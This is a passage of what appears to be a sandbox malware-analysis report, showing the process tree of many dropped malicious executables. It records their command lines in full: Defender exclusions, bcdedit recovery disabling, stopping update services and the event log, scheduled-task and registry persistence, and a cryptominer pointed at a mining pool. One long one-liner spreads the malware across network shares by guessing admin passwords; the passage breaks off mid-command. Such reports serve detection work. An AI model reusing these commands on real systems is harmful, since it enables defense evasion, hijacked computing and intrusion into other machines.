      Suspicious use of SetWindowsHookEx
      PID:2780
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\IerLRtXpEcMnUjz.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3156
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IerLRtXpEcMnUjz.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6284
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3936
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5840
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5832
- - C:\Users\Admin\AppData\Local\Temp\Files\ld.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ld.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:2288
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      4⤵
      PID:3420
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {current} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1092
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
      4⤵
      PID:972
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {current} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4544
- - C:\Users\Admin\AppData\Local\Temp\Files\newpinf.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\newpinf.exe"
    3⤵
    - Executes dropped EXE
    PID:6380
- - C:\Users\Admin\AppData\Local\Temp\Files\nn.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nn.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5964
  - - C:\Users\Admin\AppData\Local\Temp\Files\nn.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\nn.exe"
      4⤵
      Executes dropped EXE
      PID:7036
- - C:\Users\Admin\AppData\Local\Temp\Files\jet.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jet.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5900
- - C:\Users\Admin\AppData\Local\Temp\Files\lumma1234.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\lumma1234.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:6036
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:728
- - C:\Users\Admin\AppData\Local\Temp\Files\hellminer.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\hellminer.exe"
    3⤵
    - Executes dropped EXE
    PID:3420
  - - C:\Users\Admin\AppData\Local\Temp\Files\hellminer.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\hellminer.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:6556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:7048
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c color
        5⤵
        
        PID:6872
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic os get Version
        5⤵
        
        PID:6024
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list
        5⤵
        
        PID:5144
    - - C:\Users\Admin\AppData\Local\Temp\Files\hellminer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Files\hellminer.exe" "--multiprocessing-fork" "parent_pid=6556" "pipe_handle=864"
        5⤵
        Executes dropped EXE
        
        PID:6088
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:6108
- - C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    PID:5896
- - C:\Users\Admin\AppData\Local\Temp\Files\mimikatz.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\mimikatz.exe"
    3⤵
    - Executes dropped EXE
    PID:5884
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:668
- - C:\Users\Admin\AppData\Local\Temp\Files\twapcdhuj20shds2WOP90sdhy.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\twapcdhuj20shds2WOP90sdhy.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:5452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\twapcdhuj20shds2WOP90sdhy.exe"
      4⤵
      PID:6280
- - C:\Users\Admin\AppData\Local\Temp\Files\chisel.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\chisel.exe"
    3⤵
    - Executes dropped EXE
    PID:5512
- - C:\Users\Admin\AppData\Local\Temp\Files\installer2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\installer2.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    PID:6172
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:772
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1204
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3780
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:6000
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2644
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:6448
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2000
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:7132
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:6528
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:6220
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:2696
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:5548
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsAutHost"
      4⤵
      Launches sc.exe
      PID:5664
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"
      4⤵
      Launches sc.exe
      PID:5200
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2480
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsAutHost"
      4⤵
      Launches sc.exe
      PID:2312
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7048
- - C:\Users\Admin\AppData\Local\Temp\Files\putty.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\putty.exe"
    3⤵
    - Executes dropped EXE
    PID:5852
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "CGMNDIHH"
      4⤵
      Launches sc.exe
      PID:5276
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2304
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:7012
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:888
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "CGMNDIHH"
      4⤵
      Launches sc.exe
      PID:3816
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Files\putty.exe"
      4⤵
      PID:3904
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:1148
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:7088
- - C:\Users\Admin\AppData\Local\Temp\Files\Pirate_24S.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Pirate_24S.exe"
    3⤵
    - Executes dropped EXE
    PID:3956
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"
      4⤵
      PID:6648
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "
        5⤵
        
        PID:5676
      - C:\Windows\system32\reg.exe
        
        C:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
        6⤵
        
        PID:5236
      - C:\Windows\SysWOW64\find.exe
        
        find /i "Windows 7"
        6⤵
        
        PID:1388
- - C:\Users\Admin\AppData\Local\Temp\Files\lrthijawd.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\lrthijawd.exe"
    3⤵
    PID:2888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\1.bat" "
      4⤵
      PID:5776
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\work.exe
        
        work.exe -priverdD
        5⤵
        
        PID:7064
      - C:\Users\Admin\AppData\Local\Temp\RarSFX2\jergs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jergs.exe"
        6⤵
        
        PID:6284
- - C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"
    3⤵
    PID:7096
  - - C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"
      4⤵
      PID:5656
- - C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
    3⤵
    PID:8
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3112
- - C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe"
    3⤵
    PID:5276
  - - C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe
      "C:\Users\Admin\AppData\Local\Temp\648b5vt13485v134322685vt.exe"
      4⤵
      PID:6544
- - C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
    3⤵
    PID:3564
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 1276
      4⤵
      Program crash
      PID:4516
- - C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\LoaderAVX.exe"
    3⤵
    PID:5580
- - C:\Users\Admin\AppData\Local\Temp\Files\yar.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\yar.exe"
    3⤵
    PID:3832
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5924
- - C:\Users\Admin\AppData\Local\Temp\Files\VmManagedSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\VmManagedSetup.exe"
    3⤵
    PID:5584
- - C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\pinguin.exe"
    3⤵
    PID:6196
- - C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
    C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe
    3⤵
    PID:4200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      PID:1184
    - - C:\Windows\System32\certutil.exe
        
        C:\Windows\System32\certutil.exe
        5⤵
        
        PID:5648
      - C:\Windows\explorer.exe
        
        explorer.exe
        6⤵
        
        PID:232
- - C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"
    3⤵
    PID:5516
- - C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
    3⤵
    - Launches sc.exe
    PID:4800
- - C:\Users\Admin\AppData\Local\Temp\Files\loader-1002.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\loader-1002.exe"
    3⤵
    PID:4904
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nspB5D3.tmp\may.bat"
      4⤵
      PID:6472
- - C:\Users\Admin\AppData\Local\Temp\Files\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"
    3⤵
    PID:2328
  - - C:\Users\Admin\AppData\Local\Temp\Files\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\setup.exe"
      4⤵
      PID:6068
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-52ercwq.cmdline"
        5⤵
        
        PID:5128
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1240
        5⤵
        
        PID:5372
- - C:\Users\Admin\AppData\Local\Temp\Files\swizzy.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\swizzy.exe"
    3⤵
    PID:5300
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2156
- - C:\Users\Admin\AppData\Local\Temp\Files\msa.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\msa.exe"
    3⤵
    PID:1604
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
      "Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\msa.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winxs.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4448
  - - C:\Users\Admin\AppData\Local\Temp\Files\msa.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\msa.exe"
      4⤵
      PID:6476
- - C:\Users\Admin\AppData\Local\Temp\Files\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\gold.exe"
    3⤵
    PID:3296
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3388
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:5888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3296 -s 320
      4⤵
      Program crash
      PID:5612
- - C:\Users\Admin\AppData\Local\Temp\Files\zardsystemschange.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\zardsystemschange.exe"
    3⤵
    PID:6712
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
      PID:1192
- - C:\Users\Admin\AppData\Local\Temp\Files\crypt6.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\crypt6.exe"
    3⤵
    PID:5336
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:6868
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 320
      4⤵
      Program crash
      PID:4816
- - C:\Users\Admin\AppData\Local\Temp\Files\QuizPokemon.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\QuizPokemon.exe"
    3⤵
    PID:5496
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Anyone Anyone.cmd & Anyone.cmd
      4⤵
      PID:4904
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2212
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        
        PID:972
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5844
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 812297
        5⤵
        
        PID:2096
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "IndieBeachesHonIo" Janet
        5⤵
        
        PID:5128
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b Praise + Bee + Random + Acoustic + Predict + Shannon + Extreme + Gnome + Sandra + Wright + Ready + Bb + Dot + Almost + Do + Continental 812297\g
        5⤵
        
        PID:6016
    - - C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif
        
        812297\Shopzilla.pif 812297\g
        5⤵
        
        PID:6252
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "MindTechPro360" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js'" /sc onlogon /F /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7204
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 15
        5⤵
        Delays execution with timeout.exe
        
        PID:4832
- - C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"
    3⤵
    PID:7056
- - C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
    3⤵
    PID:1984
- - C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe"
    3⤵
    PID:2348
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\ngown.exe"
      4⤵
      PID:236
- - C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe"
    3⤵
    PID:2436
  - - C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe" --local-service
      4⤵
      PID:6104
  - - C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\AnyDesk.exe" --local-control
      4⤵
      PID:5304
- - C:\Users\Admin\AppData\Local\Temp\Files\look.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\look.exe"
    3⤵
    PID:4644
  - - C:\Users\Admin\AppData\Local\Temp\Files\look.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\look.exe"
      4⤵
      PID:7124
- - C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
    3⤵
    PID:6868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp21FE.tmp.bat""
      4⤵
      PID:3664
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:6800
    - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
        
        "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        
        PID:1028
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        
        PID:4388
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4256
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        6⤵
        
        PID:1508
- - C:\Users\Admin\AppData\Local\Temp\Files\googleads.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\googleads.exe"
    3⤵
    PID:4312
- - C:\Users\Admin\AppData\Local\Temp\Files\IMG001.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\IMG001.exe"
    3⤵
    PID:5256
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      PID:1960
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        Kills process with taskkill
        
        PID:3948
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      PID:5168
  - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
      "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      PID:5188
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        
        PID:5128
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        6⤵
        Kills process with taskkill
        
        PID:5816
    - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        5⤵
        
        PID:5060
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        5⤵
        
        PID:7080
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        6⤵
        
        PID:3580
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        
        PID:1164
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5660
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        
        PID:5456
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        5⤵
        Power Settings
        
        PID:6368
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:2480
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:5604
      - C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        6⤵
        Power Settings
        
        PID:4440
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0402& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start 